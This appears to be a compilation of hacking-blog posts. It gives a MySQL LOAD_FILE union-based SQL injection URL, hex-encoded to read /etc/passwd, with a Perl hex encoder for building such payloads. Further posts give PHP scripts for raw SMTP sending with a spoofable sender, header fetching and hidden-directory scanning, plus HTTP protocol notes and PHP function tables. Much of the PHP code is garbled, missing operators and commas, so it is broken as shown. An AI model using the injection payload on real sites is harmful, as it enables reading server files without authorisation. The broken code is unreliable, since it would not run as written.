MYSQL LOAD_FILE SQL Injection

So today I was reading up on some SQL injection techniques, and came across one that I had not seen before. I found out that it is possible to use a UNION SELECT with the built-in MYSQL LOAD_FILE function, to read the contents of any file on the system. This only works if the user has been granted permission to use the LOAD_FILE function, and of course MYSQL DAEMON must have permission to read the file. Also, I found out that the LOAD_FILE function can read use with HEX decimal characters.

Example Injection: www.example.com/article.php?id=1+union+select+LOAD_FILE(0x2f6574632f706173737764)

This will return the contents of the /etc/passwd on a linux machine.

I also came across a handy perl script today that will encode a given string into HEX.

Perl HEX converter:

Note: There is a underscore between LOAD and FILE.


print "Enter string to encode:";
$str=<STDIN>;chomp $str;

$enc = encode($str); print "Hex Encoded value: 0x$enc\n";

sub encode{ #Sub to encode
@subvar=@_;
my $sqlstr =$subvar[0];

@ASCII = unpack("C*", $sqlstr);
foreach $line (@ASCII) {

$encoded = sprintf('%lx',$line);
$encoded_command .= $encoded;

}
return $encoded_command;

}

PHP Mail Script

Today I wrote a command line PHP mail script. You are able to do this manually with programs such as Netcat or Telnet, but this just makes it easier and quicker. Once you run the script from the command line it will ask you for the host, recipient, email to mail from, subject, and message. This can be used quickly to test out a mail server.


<?php
if ($argc 1) {
 echo 
"This script does not take any arguments.\n";
 exit;
}
function 
read ($length='255') {
 if (!isset (
$GLOBALS['StdinPointer'])) {
  
$GLOBALS['StdinPointer'] = fopen ("php://stdin","r");
 }
 
$line fgets ($GLOBALS['StdinPointer'],$length);
 return 
trim ($line);

echo 
"\n";
echo 
"Enter Mail Server IP Address: ";
$host read(30) . "\n";
echo 
"RCPT: ";
$rcpt read(40) . "\n";
echo 
"Mail From: ";
$from read(40) . "\n";
echo 
"Subject: ";
$subject read(25) . "\n";
echo 
"Message: ";
$message read(500) . "\n";

if ( (strlen($host) < 5)  || (strlen($rcpt) < 10) || 
     (
strlen($from) < 10) || (strlen($subject) < 2) || 
     (
strlen($message) < 5) ) {
 echo 
"You need to enter all fields properly.\n";
 exit;
}

$fp fsockopen($host,25,$errstr,$errno,100);
if (!
$fp) {
 echo 
"$errstr ($errno)";
} else {
 
$out  "helo h4x0r\r\n";
 
$out .= "mail from:$from\r\n";
 
$out .= "rcpt to:$rcpt\r\n";
 
$out .= "data\r\n";
 
$out .= "Subject:$subject\r\n\r\n";
 
$out .= "$message\r\n.\r\n";
 
fwrite($fp$out);
 
fclose($fp);

?>

PHP HTTP Script

This is a simple script I wrote to do GET/OPTIONS/HEAD requests to a website. It’s a command line PHP script which uses fsockopen to connect to the server. This comes in handy when you need to see headers received from a website. Also, it’s good to see what is returned by the OPTIONS directive.


<?php

if ($argc 4) {
echo 
"
---------------------------------------------------\n
HTTP Check Headers Script (Written by Tully Rankin)\n
Usage: headers.php [site] [get|head|options] file\n
Example: headers.php www.example.com get /\n
---------------------------------------------------
"
;
 exit;
} else {
 
$site $argv[1];
}

$request strtolower($argv[2]);
$file $argv[3];

if ($request == "get") {
  
$out "GET $file HTTP/1.1\r\n";
  
$out .= "Host: $site\r\n";
  
$out .="Connection: Close\r\n\r\n";
} else if (
$request == "options") {
  
$out "OPTIONS $file HTTP/1.1\r\n";
  
$out .= "Host: $site\r\n";
  
$out .="Connection: Close\r\n\r\n";
} else if (
$request == "head") {
  
$out "HEAD $file HTTP/1.1\r\n";
  
$out .= "Host: $site\r\n";
  
$out .="Connection: Close\r\n\r\n";
} else {
 echo 
"Incorrect Request Type\n";
 exit;
}

$fp fsockopen($site,80,$errstr,$errno,30);
if (!
$fp) {
 echo 
"$errstr ($errno)";
 } else {
  
fwrite($fp$out);
  while (!
feof($fp)) {
   echo 
fgets($fp1024);
  }
fclose($fp);
 }
 
 
?>

PHP Site Scanner

This is a script I wrote to go through a list of URLS and return the Server Response code. This can be used to look for site vulnerabilities such as hidden directories. This example only has a few pages in the array. If you have a big list of common directories, the best way would be to have the script load those directories line by line from the file. Also, if you were looking for a particular response code you could either pipe the output to grep, or add the response code after the “HTTP/1.1″ in the strstr function.


<?php

$host "www.google.com";
$port 80;
$pages = array("/cgi-bin","/admin","/test","/beta");

foreach ($pages as $page) {
 
$fp fsockopen($host,$port,$errno,$errstr,30);
 if (!
$fp) {
  echo 
"$errstr ($errno)";
 } else {
 
$out "GET $page HTTP/1.1\r\n";
 
$out.= "Host: $host\r\n";
 
$out .= "Connection: Close\r\n\r\n";
 
fwrite($fp,$out);
 while (!
feof($fp)) {
  
$data fread($fp20);
  if (
strstr($data,'HTTP/1.1')) {
   echo 
" Site: $host \n Page: $page \n Code: $data \n\n";
  } 
 } 
 unset(
$data);
 unset(
$out);
 
fclose($fp);
 }
}

?>

HTTP Protocol

HTTP Requests

All HTTP messages (requests and responses) consist of one or
more headers, each on a separate line, followed by a mandatory blank line,
followed by an optional message body.

 

The first line of every HTTP request consists of three
items, separated by spaces:

 

  • A very
    indicated the HTTP method. The most commonly used method is GET, whose
    function is to retrieve a resource from the web server. GET requests do
    not have a message body, so there is no further data following the blank
    line after the message headers.

 

  • The
    requested URL. The URL functions as a name for the resource being
    requested, together with an optional query string containing parameters
    that the client is passing to that resource.

 

  • The
    HTTP version being used. The only HTTP versions in common use on the
    Internet are 1.0 and 1.1, and most browsers use version 1.1 by default.
    There are a few differences between the specifications of these two
    versions; however, the only difference you are likely to encounter when
    attacking web applications is that in version 1.1 the host request header
    is mandatory.

 

HTTP Responses

The first line of every HTTP response consists of three
items, separated by spaces:

 

  • The
    HTTP version being used.

 

  • A
    numeric status code indicating the result of the request. 200 is the most
    common status code; it means that the request was successful and the
    requested resource is being treturned.

 

  • A
    textual “reason phrase” further describing the status of the response.
    This can have any value and is not used for any purpose by current
    browsers.

 

HTTP Methods

The two main methods are GET and POST. There are others such
as the following:

 

  • HEAD -
    This functions in the same way as a GET request except that the server
    should not return a message body in its response. The server should return
    the same headers that it would have returned to the corresponding GET
    request. Hence, this method can be used for checking whether a resource is
    present before making a GET request for it.

 

  • TRACE
    - This method is designed for diagnostic purposes. The server should
    return in the response body the exact contents of the request message that
    it received. This can be used to detect the effect of any proxy servers
    between the client and server that may manipulate the request. It can also
    sometimes be used as part of an attack against other applications users.

 

  • OPTIONS
    - This method asks the server to report the HTTP methods that are
    available for a particular resource. The server will typically return a
    response containing an Allow header that lists the available methods.

 

  • PUT -
    This method attempts to upload the specified resource to the server, using
    the content contained in the body of the request. If this method is
    enabled, then you may be able to leverage it to attack the application;
    for example, by uploading an arbitrary script and executing this on the
    server.

 

[NOTE]

The correct technical term for a URL is actually URI (or
uniform resource identifier), but his term is really only used in formal
specifications.)

 

HTTP Headers

 

General Headers

 

  • Connection
    - This is used to inform the other end of the communication whether it
    should close the TCP connection after the HTTP transation has completed or
    keep it open for further messages.

 

  • Content
    Encoding – This is used to specify what kind of encoding is being used for
    the content contained in the message body, such as gzip, which is used by
    some applications to compress responses for faster transmission.

 

  • Content-Length
    - This is used to specify the length of the message body, in bytes (except
    in the case of responses to HEAD requests, when it indicates the length of
    the body in the response to the corresponding GET request).

 

  • Content-Type
    - This is used to specify the type of content contained in the message
    body; for example, text/html for HTML documents.

 

  • Transfer-Encoding
    - This is used to specify any encoding that was performed on the message
    body to facilitate its transfer over HTTP. It is normally used to specify
    chunked encoding when this is employed.

 

Request Headers

 

  • Accept
    - This is used to tell the server what kinds of content the client is
    willing to accept, such as image types, office document formats, and so
    on.

 

  • Accept-Encoding
    - This is used to tell the server what kinds of content encoding the
    client is willing to accept.

 

  • Authorization
    - This is used to submit credentials to the server for one of the built-in
    HTTP authentication types.

 

  • Cookie
    - This is used to submit cookies to the server which were previously
    issued by it.

 

  • Host -
    This is used to specify the hostname that appeared in the full URL being
    requested.

 

  • If-Modified-Since
    - This is used to specify the time at which the browser last received the
    requested resource. If the resource has not changed since that time, the
    server may instruct the client to use its cached copy, using a response
    with status code 304.

 

  • If-None-Match
    - This is used to specify an entity tag, which is an identifier denoting
    the contents of the message body. The browser submits the entity tag that
    the server issued with the requested resource when it was last received.
    The server can use the entity tag to determine whether the browser may use
    its cached copy of the resource.

 

  • Referer
    - This is used to specify the URL from which the current request
    originated.

 

  • User-Agent
    - This is used to provide information about the browser or other client
    software that generated the request.

 

Response Headers

 

  • Cache-Control
    - This is used to pass caching directives to the browser (for example,
    no-cache)

 

  • ETag -
    This is used to specify an entity tag. Clients can submit this identifier
    in future requests for the same resource in the If-None-Match header to
    notify the server which version of the resource the browser currently
    holds in its cache.

 

  • Expires
    - This is used to instruct the browser how long the contents of the message
    body are valid for. The browser may use the cached copy of this resource
    until this time.

 

  • Location
    - This is used in redirection responses (those with a status code starting
    with a 3) to specify the target of the redirect.

 

  • Pragma
    - This is used to pass caching directive to the browser (for example, no
    cache).

 

  • Server
    - This is used to provide information about the web server software being
    used.

 

  • Set-Cookie
    - This is used to issue cookies to the browser that it will submit back to
    the server in subsequent requests.

 

  • WWW-Authenticate
    - This is used in responses with a 401 status code to provide details of
    the type(s) of authentication supported by the server.

 

Cookies

 

  • The
    cookie mechanism enabled the server to send items of data to the client,
    which the client stores and resubmits back to the server.

 

  • Expires
    - Used to set a date until which the cookie is valid. This will cause the
    browser to save the cookie to persistent storage, and it will be reused in
    subsequent browser sessions until the expiration date is reached. If this
    attribute is not set, the cookie is used only in the current browser
    session.

 

  • Domain
    - Used to specify the domain for which the cookie is valid. This must be
    the same or a parent of the domain from which the cookie is received.

 

  • Path -
    Used to specify the URL path for which the cookie is valid.

 

  • Secure
    - If this attribute is set, the the cookie will only ever be submitted in
    the HTTPS requests.

 

  • HttpOnly
    - If this attribute is set, then the cookie cannot be directly accessed
    via client-side JavaScript, although not all browsers support this
    restriction.

 

Status Codes

Each HTTP response message must contain a status code in its
first line, indicating the result of the request. The status codes fall into
five groups, accoding to the first digit of the code.

 

1xx – Informational.

2xx – The request was successful.

3xx – The client is redirected to a different resource.

4xx – The request contains an error of some kind.

5xx – The server encountered an error fulfilling the
request.

 

Some of the common Status Codes you will encounter when
trying to hack a web application are as follows:

 

100 Continue – This response is sent in some circumstances
when a client submits a request containing a body. The response indicates that
the request headers were received and that the client should continue sending
the body. The server will then return a second response when the request has
been completed.

 

200 Ok – This indicates that the request was successful and
the response body contains the result of the request.

 

201 Created – This is returned in response to a PUT request
to indicate that the request was successful.

 

301 Moved Permanently – This redirects the browser
permanently to a different URL, which is specified in the Location header. The
client should use the new URL in the future rather than the original.

 

302 Found – This redirects the browser temporarily to a
different URL, which is specified in the Location header. The client should
revert to the original URL in subsequent requests.

 

304 Not Modified – This instructs the browser to use its
cached copy of the requested resource. The server uses the If-Modified-Since
and If-None-Match request headers to determine whether the client has the
latest version of the resource.

 

400 Bad Request – This indicates that the client submitted
an invalid HTTP request. You will probably encounter this when you have
modified a request in certain invalid ways, for example by placing a space
character into the URL.

 

401 Unauthorized – The server requires HTTP authentication
before the request will be granted. The WWW-Authenticate header contains
details of the type(s) of authentication supported.

 

403 Forbidden – This indicates that no one is allowed to
access the requested resource, regardless of authentication.

 

404 Not Found – This indicates that the requested resource
does not exist.

 

405 Method Not Allowed – This indicates that the method used
in the request is not supported for the specified URL. For example, you may
receive this status code if you attempt to use the PUT method where it is not
supported.

 

413 Request Entity Too Large – If you are probing for buffer
overflow vulnerabilities in native code, and so submitting long strings of
data, this indicates that the body of your request is too large for the server
to handle.

 

414 Request URI Too Long – Similar to the previous response,
this indicates that the URL used in the request is too large for the server to
handle.

 

500 Internal Server Error – This indicates that the server
encountered an error fulfilling the request. This normally occurs when you have
submitted unexpected input that caused an unhandled error somewhere within the
application’s processing. You should review the full contents of the server’s
response closely for any details indicating the nature of the error.

 

503 Service Unavailable – This normally indicates that,
although the web server itself Is functioning and able to respond to requests,
the application accessed via the server is not responding. You should verify
whether this is the result of any action that you have performed.

 

[NOTE]

SSL has now strictly been superseded by transport layer
security (TLS), but the latter is still normally referred to using the older
name.

 

HTTP Authentication

The HTTP protocol includes its own mechanisms for
authenticating users, using various authentication schemes, including:

 

Basic – This is a
very simple authentication mechanism that sends user credentials as a  Base64-encoded string in a request header
with each message.

 

NTLM - This is a
challenge-response mechanism and uses a version of the Windows NTLM protocol.

 

Digest - This is
a challenge-response mechanism and uses MD5 checksums of a nonce with the
user’s credentials.

 

 

 

PHP string functions and regular expressions

PHP String Functions & Regular
Expressions

 

String Functions

 

Function

What it does

Example

Concatenation

Add’s strings together.

$x . $t

     Addslashes($str)

Returns a string with backslashes before characters that
need to be quoted in database queries etc. These characters are single quote
(), double quote (), backslash (\) and NUL (the NULL byte).

string addslashes
( string $str )

 

Rtrim($x)

rtrimStrip
whitespace (or other characters) from the end of a string

string rtrim
( string $str [, string $charlist
] )

 

Ltrim($x)

Strip whitespace (or other characters) from the
beginning of a string.

string ltrim
( string $str [, string $charlist
] )

 

Strlen($x)

Returns the length of the given string .

int strlen
( string $string )

 

Strpos($str,$x)

 

Find position of first occurrence of
a string

 

int strpos
( string $haystack , mixed $needle
[, int $offset= 0
] )

 

Explode($d,$str)

explodeSplit a string by string

 

array explode
( string $delimiter , string $string
[, int $limit ] )

 

implode($d,$str)

Join array elements with a string.

string implode
( string $glue , array $pieces
)

 

Soundex($str)

Calculate the soundex key of a
string.

string soundex
( string $str )

Metaphone($str)

Calculate the metaphone key of a
string

string metaphone
( string $str [, int $phones= 0 ] )

 

 

 

Regular Functions

 

Function

Description

Example

Ereg($p,$str,[$m])

Regular expression match

int ereg
( string $pattern , string $string
[, array &$regs ] )

int eregi
( string $pattern , string $string
[, array &$regs ] )

 

Eregi($p,$str, [$m])

Case insensitive regular expression
match

int eregi
( string $pattern , string $string
[, array &$regs ] )

 

Ereg_replace($p,$r,$str)

Replace regular expression

string ereg_replace
( string $pattern , string $replacement
, string $string )

 

Sql_regcase($p)

Make regular expression for case
insensitive match

string sql_regcase
( string $string )

 

Split($p,$str,[$limit])

Split string into array by regular
expression

array split
( string $pattern , string $string
[, int $limit ] )

 

Preg_match()

Perform a regular expression match

int preg_match
( string $pattern , string $subject
[, array &$matches [, int $flags
[, int $offset ]]] )

 

Preg_match_all()

Perform a global regular expression
match

int preg_match_all
( string $pattern , string $subject
, array &$matches [, int $flags
[, int $offset ]] )

 

Preg_replace()

Perform a regular expression search
and replace

mixed
preg_replace ( mixed $pattern
, mixed $replacement
, mixed $subject
[, int $limit= -1
[, int &$count ]] )

 

Preg_split()

Split string by a regular expression

array preg_split
( string $pattern , string $subject
[, int $limit= -1
[, int $flags= 0
]] )

 

 

 

MetaCharacters

.  

 

Any ONE Character

[A-Z0-9]

 

Any one of the chars

[^a-cx-z]

Not one of the chars

^

Begins with

$

End with

X{2}

2 consecutive “x”

X{2,5}

Between 2 and 5 consecutive “x”

X?

0 or 1 “x”

X+

1 or more “x”

\d

Digit

\D

Non-digit

\w

Word

\W

Non-word

\s

Space char

\S

Not a space char

(x|z)

X or Z